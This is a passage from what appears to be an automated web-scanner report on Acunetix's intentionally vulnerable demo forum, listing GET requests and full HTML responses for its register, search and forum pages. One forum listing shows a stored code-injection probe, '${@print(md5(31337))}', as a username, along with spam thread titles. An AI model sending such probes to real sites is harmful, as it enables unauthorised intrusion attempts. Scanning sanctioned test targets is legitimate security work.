applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 402 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 3673 |
| Response Body - size: 3,673 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 308 bytes. |
GET http://testasp.vulnweb.com/Search.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:22 GMT Content-Length: 2809 |
| Response Body - size: 2,809 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 332 bytes. |
GET http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 2961 |
| Response Body - size: 2,961 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum search</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form name="frmSearch" method="get" action=""> <div class="FramedForm"> <input name="tfSearch" type="text" class="search"> <input class="search" type="submit" value="search posts"> </div> </form> <div class='path'>You searched for 'ZAP'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 10037 |
| Response Body - size: 10,037 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=7'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=8'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=9'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=10'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=11'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=12'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=13'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:29 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=14'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=15'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=16'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=17'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:30 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=18'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=19'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=20'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=21'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=22'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:31 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=23'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=24'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=25'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=26'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:32 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=27'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=28'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=29'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=30'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:13:43 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=31'>Hot galleries, daily updated collections</a></div></td><td>1</td><td>victoriadi1</td><td>3/13/2022 10:23:53 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=32'>Big Ass Photos - Free Huge Butt Porn, Big Booty Pics</a></div></td><td>1</td><td>susanac1</td><td>3/13/2022 12:03:13 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=33'>Best Nude Playmates & Centerfolds, Beautiful galleries daily updates</a></div></td><td>1</td><td>kristiela3</td><td>3/13/2022 3:28:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=34'>New hot project galleries, daily updates</a></div></td><td>1</td><td>friedajd1</td><td>3/13/2022 9:02:56 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=35'>Free Porn Pictures and Best HD Sex Photos</a></div></td><td>1</td><td>dianezg60</td><td>3/13/2022 11:25:30 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=36'>test</a></div></td><td>1</td><td>hanxuan</td><td>3/14/2022 1:14:17 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=37'>Hot photo galleries blogs and pictures</a></div></td><td>1</td><td>sethpq11</td><td>3/14/2022 2:11:33 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=38'>Mr.</a></div></td><td>1</td><td>${@print(md5(31337))}\</td><td>3/14/2022 4:18:48 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=39'>Shemale Sexy Galleries</a></div></td><td>1</td><td>ineshy11</td><td>3/14/2022 6:42:20 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=40'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn</a></div></td><td>1</td><td>myrnaou3</td><td>3/14/2022 7:22:30 AM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showforum.asp?id=1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=1 HTTP/1.1
